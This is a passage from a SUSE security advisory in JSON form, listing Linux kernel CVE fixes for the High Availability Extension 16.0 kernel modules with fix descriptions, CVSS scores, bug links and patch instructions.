"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
